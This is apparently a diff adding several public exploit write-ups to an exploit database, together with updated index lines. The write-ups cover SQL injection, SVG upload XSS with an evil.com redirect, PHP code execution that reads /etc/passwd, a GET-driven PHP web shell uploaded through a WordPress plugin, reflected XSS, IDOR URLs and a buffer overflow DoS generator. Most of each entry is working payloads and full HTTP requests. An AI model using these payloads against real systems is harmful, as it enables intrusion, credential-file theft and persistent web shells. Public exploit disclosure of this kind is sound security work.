 Parameter: pid (GET)
 Type: time-based blind
 Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
 Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot
 ---
 [-] Done
--- a/exploits/php/webapps/51656.txt
+++ b/exploits/php/webapps/51656.txt
@ -0,0 +1,101 @@
 # Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
 # Date: 3-8-2023
 # Category: Web Application
 # Exploit Author: Rajdip Dey Sarkar
 # Version: 3.3
 # Tested on: Windows/Kali
 # CVE: CVE-2023-39115
 Description:
 ----------------
 An arbitrary file upload vulnerability in Campcodes Online Matrimonial
 Website System Script v3.3 allows attackers to execute arbitrary code via
 uploading a crafted SVG file.
 SVG Payload
 ------------------
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
 http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
 stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")
      window.location.href="https://evil.com"
   </script>
 </svg>
 Steps to reproduce
 --------------------------
 -Login with your creds
 -Navigate to this directory - /profile-settings
 -Click on Gallery -> Add New Image -> Browser -> Add Files
 -Choose the SVG file and upload done
 -Click the image!! Payload Triggered
 Burp Request
 -------------------
 POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
 Gecko/20100101 Firefox/115.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
 Content-Type: multipart/form-data;
 boundary=---------------------------167707198418121100152548123485
 Content-Length: 1044
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
 Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
 acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
 Sec-Fetch-Dest: empty
 Sec-Fetch-Mode: cors
 Sec-Fetch-Site: same-origin
 -----------------------------167707198418121100152548123485
 Content-Disposition: form-data; name="relativePath"
 null
 -----------------------------167707198418121100152548123485
 Content-Disposition: form-data; name="name"
 file (1).svg
 -----------------------------167707198418121100152548123485
 Content-Disposition: form-data; name="type"
 image/svg+xml
 -----------------------------167707198418121100152548123485
 Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
 Content-Type: image/svg+xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
 http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
 stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")
      window.location.href="https://evil.com"
   </script>
 </svg>
 -----------------------------167707198418121100152548123485--
--- a/exploits/php/webapps/51658.txt
+++ b/exploits/php/webapps/51658.txt
@ -0,0 +1,15 @@
 # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
 # Date: 03.08.2023
 # Exploit Author: Miguel Santareno
 # Vendor Homepage: https://www.myeventon.com/
 # Version: 4.4
 # Tested on: Google and Firefox latest version
 # CVE : CVE-2023-2796
 # 1. Description
 The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
 # 2. Proof of Concept (PoC)
 Proof of Concept:
 https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
--- a/exploits/php/webapps/51659.txt
+++ b/exploits/php/webapps/51659.txt
@ -0,0 +1,15 @@
 # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
 # Date: 03.08.2023
 # Exploit Author: Miguel Santareno
 # Vendor Homepage: https://www.myeventon.com/
 # Version: 4.4
 # Tested on: Google and Firefox latest version
 # CVE : CVE-2023-3219
 # 1. Description
 The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
 # 2. Proof of Concept (PoC)
 Proof of Concept:
 https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
--- a/exploits/php/webapps/51660.txt
+++ b/exploits/php/webapps/51660.txt
@ -0,0 +1,45 @@
 Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)
 Application: webutler Cms
 Version: v3.2
 Bugs:  RCE
 Technology: PHP
 Vendor URL: https://webutler.de/en
 Software Link: http://webutler.de/download/webutler_v3.2.zip
 Date of found: 03.08.2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. login to account as admin
 2. go to visit media
 3.upload phar file
 4. upload poc.phar file
 poc.phar file contents :
 <?php echo system("cat /etc/passwd");?>
 5. Visit to poc.phar file
 poc request:
 POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1
 Host: localhost
 Content-Length: 40
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
 X_FILENAME: poc.phar
 sec-ch-ua-platform: ""
 Accept: */*
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/webutler_v3.2/admin/browser/index.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu
 Connection: close
 <?php echo system("cat /etc/passwd");?>
--- a/exploits/php/webapps/51661.txt
+++ b/exploits/php/webapps/51661.txt
@ -0,0 +1,45 @@
 Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
 Application: webedition Cms
 Version: v2.9.8.8
 Bugs:  RCE
 Technology: PHP
 Vendor URL: https://www.webedition.org/
 Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
 Date of found: 03.08.2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps
 1. Login account
 2. Go to New -> Webedition page -> empty page
 3. Select php
 4. Set as "><?php echo system("cat /etc/passwd");?>  Description area
 Poc request:
 POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
 Host: localhost
 Content-Length: 1621
 Cache-Control: max-age=0
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: ""
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: iframe
 Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
 Connection: close
 we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
--- a/exploits/php/webapps/51662.txt
+++ b/exploits/php/webapps/51662.txt
@ -0,0 +1,58 @@
 Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
 Application: Webedition CMS
 Version: v2.9.8.8
 Bugs:  Stored Xss
 Technology: PHP
 Vendor URL: https://www.webedition.org/
 Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
 Date of found: 03.08.2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps
 1. Login to account
 2. Go to New ->  Media -> Image
 3. Upload malicious svg file
 svg file content:
 """
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 """
 Poc request:
 POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
 Host: localhost
 Content-Length: 761
 Cache-Control: max-age=0
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: ""
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: iframe
 Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
 Connection: close
 we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
--- a/exploits/php/webapps/51663.txt
+++ b/exploits/php/webapps/51663.txt
@ -0,0 +1,35 @@
 # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 29/07/2023
 # Vendor: adivaha - Travel Tech Company
 # Vendor Homepage: https://www.adivaha.com/
 # Software Link: https://wordpress.org/plugins/adiaha-hotel/
 # Demo: https://www.adivaha.com/demo/adivaha-online/
 # Version: 2.3
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /mobile-app/v3/
 GET parameter 'isMobile' is vulnerable to XSS
 https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]
 XSS Payload: clq95"><script>alert(1)</script>lb1ra
 [-] Done
--- a/exploits/php/webapps/51664.txt
+++ b/exploits/php/webapps/51664.txt
@ -0,0 +1,100 @@
 # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
 # Date: 2023-07-20
 # Exploit Author: Mehmet Kelepçe
 # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
 # Software Link: https://wordpress.org/plugins/forminator/
 # Version: 1.24.6
 # Tested on: PHP - Mysql - Apache2 - Windows 11
 HTTP Request and vulnerable parameter:
 -------------------------------------------------------------------------
 POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
 Host: localhost
 Content-Length: 1756
 sec-ch-ua:
 Accept: */*
 Content-Type: multipart/form-data;
 boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
 Safari/537.36
 sec-ch-ua-platform: ""
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: wp-settings-time-1=1689794282;
 wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
 Connection: close
 .
 .
 .
 .
 .
 ------WebKitFormBoundaryTmsFfkbegmAjomne
 Content-Disposition: form-data; name="postdata-1-post-image";
 filename="mehmet.php"
 Content-Type: application/octet-stream
 <?php
 $_GET['function']($_GET['cmd']);
 ?>
 Source Code:
 wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
 --------------------------------------------------------------------
        public function has_upload() {
 $fields = $this->get_fields();
 if ( ! empty( $fields ) ) {
 foreach ( $fields as $field ) {
 if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
 return true;
 }
 }
 }
 return false;
 }
 Vulnerable parameter: postdata-1-post-image
 and
 Source code:
 wp-content/plugins/forminator/library/fields/postdata.php:
 -------------------------------------------------------------------
 if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
 if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
 $_FILES[ $image_field_name ]['name'] ) ) {
 $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
 $valid     = wp_check_filetype( $file_name );
 if ( false === $valid['ext'] || ! in_array( $valid['ext'],
 $this->image_extensions ) ) {
 $this->validation_message[ $image_field_name ] = apply_filters(
 'forminator_postdata_field_post_image_nr_validation_message',
 esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
 $id
 );
 }
 }
 }
 Vulnerable function: $image_field_name
 -------------------------------------------------------------------------
 Payload file: mehmet.php
 <?php
 $_GET['function']($_GET['cmd']);
 ?>
 -------------------------------------------------------------------------
--- a/exploits/windows/dos/51665.py
+++ b/exploits/windows/dos/51665.py
@ -0,0 +1,29 @@
 # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
 # Discovered by: Yehia Elghaly
 # Discovered Date: 2023-08-04
 # Vendor Homepage: https://www.xlightftpd.com/
 # Software Link : https://www.xlightftpd.com/download/setup.exe
 # Tested Version: 3.9.3.6
 # Vulnerability Type: Buffer Overflow Local
 # Tested on OS: Windows XP Professional SP3 - Windows 11 x64
 # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
 # Steps to reproduce:
 # 1. - Download and Xlight FTP Server
 # 2. - Run the python script and it will create exploit.txt file.
 # 3. - Open Xlight FTP Server 3.9.3.6
 # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
 # 6. - Execute a Program after use logged in-  Paste the characters
 # 7  - Crashed
 #!/usr/bin/env python3
 exploit = 'A' * 294
 try:
    with open("exploit.txt","w") as file:
        file.write(exploit)
    print("POC is created")
 except:
    print("POC not created")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3853,6 +3853,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,,2018-01-24,2018-01-26,0,CVE-2018-5997,,,,,
 18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,,
 34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware,,2010-10-04,2014-09-28,1,,,,,,https://www.securityfocus.com/bid/43685/info
 51642,exploits/hardware/remote/51642.py,"ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)",2023-08-04,"Riyan Firmansyah of Seclab",remote,hardware,,2023-08-04,2023-08-04,0,,,,,,
 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,,
 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
@ -3886,6 +3887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30915,exploits/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,remote,hardware,32764,2014-01-14,2014-01-14,1,OSVDB-101653;CVE-2014-0659,"Metasploit Framework (MSF)",,,,
 32938,exploits/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,remote,hardware,32674,2014-04-18,2014-04-18,0,OSVDB-106324,,,,,
 23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
 51657,exploits/hardware/remote/51657.txt,"Shelly PRO 4PM v0.11.0 - Authentication Bypass",2023-08-04,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-08-04,2023-08-04,0,CVE-2023-33383,,,,,
 35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
 40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
 51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
@ -12053,6 +12055,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
 51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,,
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
@ -13305,6 +13308,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,,,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info
@ -13456,6 +13460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37407,exploits/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",webapps,php,,2012-06-15,2015-06-28,1,,,,,,https://www.securityfocus.com/bid/54023/info
 37438,exploits/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 - Cross-Site Scripting",2012-06-21,"Sooraj K.S",webapps,php,,2012-06-21,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54117/info
 45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80,2018-12-09,2018-12-10,0,CVE-2018-19877,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comloganalyzer-4.1.6.tar.gz,
 51643,exploits/php/webapps/51643.txt,"Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting",2023-08-04,Pedro,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-36306,,,,,
 47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80,2019-08-08,2019-08-08,0,CVE-2019-14346,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
 47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,,2019-11-08,2019-11-08,0,CVE-2019-14347,,,,,
 47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php,,2020-01-28,2020-02-03,1,CVE-2020-7991,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
@ -15258,6 +15263,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6594,exploits/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,webapps,php,,2008-09-26,2016-12-21,1,OSVDB-49892;CVE-2008-4366,,,,http://www.exploit-db.comcameralife-2.6.2b4.zip,
 6710,exploits/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,webapps,php,,2008-10-08,2016-12-26,1,OSVDB-51859;CVE-2008-6087;OSVDB-51857;CVE-2008-6086,,,,http://www.exploit-db.comcameralife-2.6.2b4.zip,
 12251,exploits/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,webapps,php,,2010-04-14,,1,,,,,,
 51656,exploits/php/webapps/51656.txt,"Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload",2023-08-04,"Rajdip Dey Sarkar",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-39115,,,,,
 30003,exploits/php/webapps/30003.txt,"Campsite 2.6.1 - '/implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-03,1,CVE-2006-5911;OSVDB-34222,,,,,https://www.securityfocus.com/bid/23874/info
 30004,exploits/php/webapps/30004.txt,"Campsite 2.6.1 - '/implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-03,1,CVE-2006-5911;OSVDB-34223,,,,,https://www.securityfocus.com/bid/23874/info
 29966,exploits/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-02,1,CVE-2006-5911;OSVDB-34187,,,,,https://www.securityfocus.com/bid/23874/info
@ -20449,6 +20455,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
